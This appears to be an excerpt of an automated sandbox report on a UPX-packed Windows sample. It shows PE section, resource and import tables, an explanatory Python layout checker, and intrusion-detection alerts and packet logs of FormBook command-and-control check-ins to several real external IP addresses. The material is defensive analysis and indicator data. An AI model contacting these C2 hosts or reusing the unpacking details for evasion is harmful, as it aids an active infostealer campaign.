IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x137bf4 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0xe1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e (MD5 of empty input) | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xe2000 | 0x56000 | 0x55e00 | 1a845b7283cfbb844ef9e3f3dfb24b5e | False | 0.98709288573508 | data | 7.935245773281257 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x138000 | 0x60000 | 0x5f800 | b0c12ccabab10c1434dc9923e4be767f | False | 0.9471378026832461 | data | 7.935757111911807 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
(The RT_MENU and RT_STRING entries sit at RVAs 0xcd4a0 to 0xcf7b8, inside UPX0, which has a raw size of 0, so they have no bytes on disk and read as empty until the stub has unpacked into that section. RT_RCDATA is a 0x58909-byte blob with ZLIB complexity 1.0, i.e. already compressed or encrypted, and is the first resource to carve for further analysis.)
RT_ICON | 0x1385ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x1386d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x138804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x138930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x138c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x138d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x139bf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x13a4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x13aa0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x13cfb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x13e064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | empty | English | Great Britain | 0
RT_STRING | 0xcd4f0 | 0x594 | empty | English | Great Britain | 0
RT_STRING | 0xcda84 | 0x68a | empty | English | Great Britain | 0
RT_STRING | 0xce110 | 0x490 | empty | English | Great Britain | 0
RT_STRING | 0xce5a0 | 0x5fc | empty | English | Great Britain | 0
RT_STRING | 0xceb9c | 0x65c | empty | English | Great Britain | 0
RT_STRING | 0xcf1f8 | 0x466 | empty | English | Great Britain | 0
RT_STRING | 0xcf660 | 0x158 | empty | English | Great Britain | 0
RT_RCDATA | 0x13e4d0 | 0x58909 | data | (none) | (none) | 1.0003335529453277
RT_GROUP_ICON | 0x196de0 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x196e5c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x196e74 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x196e8c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x196ea4 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x196f84 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
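To make the numbers in the section, data-directory and resource tables above check each other, here is an added Python example; it is not code from the report or from the sample. It carries the three section rows as constants, resolves RVAs to the section that contains them, reports whether a given RVA has bytes on disk (which is what separates the empty RT_MENU/RT_STRING entries from the RT_ICON entries), and recomputes the immediates that the UPX stub at the entry point must use. The resource RVAs, entry point and image base are the ones the report lists.

```python
"""Cross-checks for the PE layout fields in the report: which section each
RVA lands in, whether that section has bytes on disk, and whether the
immediates in the entry-point stub agree with the section table."""
from dataclasses import dataclass
from typing import Optional

IMAGE_BASE = 0x400000
ENTRY_POINT = 0x537A10  # 'Entrypoint' in the report (a virtual address)


@dataclass(frozen=True)
class Section:
    name: str
    rva: int
    vsize: int
    raw_size: int


# Section table as listed in the report (virtual address, virtual size, raw size).
SECTIONS = (
    Section("UPX0", 0x1000, 0xE1000, 0x0),
    Section("UPX1", 0xE2000, 0x56000, 0x55E00),
    Section(".rsrc", 0x138000, 0x60000, 0x5F800),
)


def section_for_rva(rva: int, sections=SECTIONS) -> Optional[Section]:
    """Section whose virtual range [rva, rva + vsize) contains the RVA."""
    for s in sections:
        if s.rva <= rva < s.rva + s.vsize:
            return s
    return None


def is_backed_on_disk(rva: int, sections=SECTIONS) -> bool:
    """True when the RVA maps to bytes that exist in the file. An RVA inside a
    section whose raw size is 0 (UPX0 here) only has content after the stub
    has unpacked into it, which is why a static listing shows it as empty."""
    s = section_for_rva(rva, sections)
    if s is None:
        return False
    return (rva - s.rva) < s.raw_size


def upx_stub_targets(packed_section: str, dest_section: str, sections=SECTIONS):
    """(esi immediate, displacement) that a UPX stub's 'mov esi, X' and
    'lea edi, [esi - D]' need to copy from the packed section into the
    empty destination section at the image base used in the report."""
    by_name = {s.name: s for s in sections}
    src = IMAGE_BASE + by_name[packed_section].rva
    dst = IMAGE_BASE + by_name[dest_section].rva
    return src, src - dst


def packer_indicators(sections=SECTIONS) -> dict:
    """Static packer hints derived only from the section table and entry point:
    the entry point outside the first section, and a first section that is
    large in memory but has no bytes on disk."""
    first = sections[0]
    ep = section_for_rva(ENTRY_POINT - IMAGE_BASE, sections)
    return {
        "entry_section": ep.name if ep else None,
        "entry_in_first_section": ep is not None and ep is first,
        "first_section_has_no_raw_data": first.raw_size == 0,
    }


if __name__ == "__main__":
    # Resource and directory RVAs from the report.
    for name, rva in (("RT_MENU", 0xCD4A0), ("RT_STRING", 0xCD4F0),
                      ("RT_ICON", 0x1385AC), ("RT_RCDATA", 0x13E4D0),
                      ("LOAD_CONFIG", 0x137BF4), ("IMPORT", 0x197374)):
        s = section_for_rva(rva)
        print(f"{name:12} {rva:#08x} -> {s.name if s else '?':6} "
              f"on disk: {is_backed_on_disk(rva)}")
    print("stub: esi=%#x, displacement=%#x" % upx_stub_targets("UPX1", "UPX0"))
    print(packer_indicators())
```

upx_stub_targets("UPX1", "UPX0") returns (0x4E2000, 0xE1000), exactly the immediates in the mov esi / lea edi pair at the top of the entry-point disassembly, so the stub and the section table describe the same layout; a mismatch there would mean the headers had been edited after packing.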
DLL | Import
(On a UPX-packed file this is the packer's own import table: a single function per DLL is kept so that the loader maps those DLLs, and the original imports are resolved in memory by the stub through LoadLibraryA and GetProcAddress. The Import Hash above therefore identifies the packer stub, not the unpacked payload.)
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetOpenFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-06T17:36:06.305032+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49715 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:06.305032+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49715 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:23.170513+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49717 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:25.846030+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49718 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:28.509256+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49719 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:31.168424+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49720 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:31.168424+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49720 | 13.248.169.48 | 80 | TCP
2024-12-06T17:36:37.927439+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49721 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:41.074454+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49722 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:41.074454+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.12 | 49722 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:43.742873+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49723 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:46.399948+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49724 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:46.399948+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49724 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:52.946445+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49725 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:55.615860+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49726 | 84.32.84.32 | 80 | TCP
2024-12-06T17:36:58.286505+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49728 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:00.952886+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49734 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:00.952886+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49734 | 84.32.84.32 | 80 | TCP
2024-12-06T17:37:08.102346+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49750 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:10.857515+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49756 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:13.493688+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49767 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:16.122569+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49772 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:16.122569+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49772 | 209.74.77.107 | 80 | TCP
2024-12-06T17:37:23.333261+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49789 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:26.005118+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49794 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:28.676989+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49800 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:31.396749+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49809 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:31.396749+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49809 | 38.47.207.164 | 80 | TCP
2024-12-06T17:37:38.720332+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49827 | 208.115.225.220 | 80 | TCP
2024-12-06T17:37:41.387774+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49833 | 208.115.225.220 | 80 | TCP
2024-12-06T17:37:44.066273+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49843 | 208.115.225.220 | 80 | TCP
2024-12-06T17:37:46.782408+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49849 | 208.115.225.220 | 80 | TCP
2024-12-06T17:37:46.782408+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49849 | 208.115.225.220 | 80 | TCP
2024-12-06T17:38:02.677034+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49886 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:05.348890+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49892 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:08.020986+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49898 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:11.822163+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49908 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:11.822163+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49908 | 172.67.162.39 | 80 | TCP
2024-12-06T17:38:18.925603+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49929 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:21.596177+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49935 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:24.271865+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49941 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:26.939013+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49948 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:26.939013+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49948 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:33.912697+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49964 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:36.585064+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49973 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:39.269011+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 49979 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:41.949933+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 49985 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:41.949933+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 49985 | 199.59.243.227 | 80 | TCP
2024-12-06T17:38:48.529809+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 50001 | 104.21.90.137 | 80 | TCP
2024-12-06T17:38:51.231199+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 50007 | 104.21.90.137 | 80 | TCP
2024-12-06T17:38:53.956005+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 50016 | 104.21.90.137 | 80 | TCP
2024-12-06T17:38:56.546963+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 50021 | 104.21.90.137 | 80 | TCP
2024-12-06T17:38:56.546963+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 50021 | 104.21.90.137 | 80 | TCP
2024-12-06T17:39:03.765359+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 50022 | 108.179.253.197 | 80 | TCP
2024-12-06T17:39:06.469988+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 50023 | 108.179.253.197 | 80 | TCP
2024-12-06T17:39:09.095603+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.12 | 50024 | 108.179.253.197 | 80 | TCP
2024-12-06T17:39:11.802745+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.12 | 50025 | 108.179.253.197 | 80 | TCP
2024-12-06T17:39:11.802745+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.12 | 50025 | 108.179.253.197 | 80 | TCP
                                                                            Dec 6, 2024 17:37:06.757599115 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:06.877474070 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:06.877567053 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:06.896686077 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:07.016499996 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:08.102135897 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:08.102215052 CET8049750209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:08.102345943 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:08.411303997 CET4975080192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.431288958 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.551214933 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:09.551981926 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.570456982 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:09.690413952 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:10.795449018 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:10.857460022 CET8049756209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:10.857515097 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:11.083372116 CET4975680192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.102260113 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.223153114 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:12.226552010 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.246458054 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:12.366875887 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:12.366906881 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:13.493470907 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:13.493568897 CET8049767209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:13.493688107 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:13.755067110 CET4976780192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:14.777179003 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:14.897243023 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:14.897384882 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:14.911601067 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:15.031780958 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:16.122333050 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:16.122354031 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:16.122569084 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:16.158673048 CET4977280192.168.2.12209.74.77.107
                                                                            Dec 6, 2024 17:37:16.282896042 CET8049772209.74.77.107192.168.2.12
                                                                            Dec 6, 2024 17:37:21.688560963 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:21.808731079 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:21.808911085 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:21.828545094 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:21.948658943 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.333261013 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:23.345650911 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.345709085 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:23.345716000 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.345760107 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:23.453212976 CET804978938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:23.453272104 CET4978980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.354476929 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.474229097 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:24.474356890 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.490030050 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:24.612837076 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.005117893 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:26.010193110 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.010226965 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.010310888 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:26.010310888 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:26.125116110 CET804979438.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:26.125360012 CET4979480192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.025895119 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.146043062 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:27.146152020 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.162319899 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:27.282337904 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:27.282351971 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.676989079 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:28.696182013 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.696232080 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:28.696443081 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.696482897 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:28.797300100 CET804980038.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:28.797372103 CET4980080192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.698501110 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.818655968 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:29.818757057 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.829133987 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:29.950495005 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:31.396498919 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:31.396567106 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:31.396749020 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:31.405069113 CET4980980192.168.2.1238.47.207.164
                                                                            Dec 6, 2024 17:37:31.524960995 CET804980938.47.207.164192.168.2.12
                                                                            Dec 6, 2024 17:37:37.445775032 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:37.565692902 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:37.570517063 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:37.583045006 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:37.702857971 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:38.720045090 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:38.720283031 CET8049827208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:38.720331907 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:39.098893881 CET4982780192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.120718956 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.240761042 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:40.240916014 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.258650064 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:40.383773088 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:41.387670040 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:41.387698889 CET8049833208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:41.387773991 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:41.771814108 CET4983380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:42.791459084 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:42.911418915 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:42.911509037 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:42.931548119 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:43.051685095 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:43.051747084 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:44.065747976 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:44.066118956 CET8049843208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:44.066272974 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:44.442737103 CET4984380192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.472079039 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.591990948 CET8049849208.115.225.220192.168.2.12
                                                                            Dec 6, 2024 17:37:45.596596956 CET4984980192.168.2.12208.115.225.220
                                                                            Dec 6, 2024 17:37:45.604543924 CET4984980192.168.2.12208.115.225.220
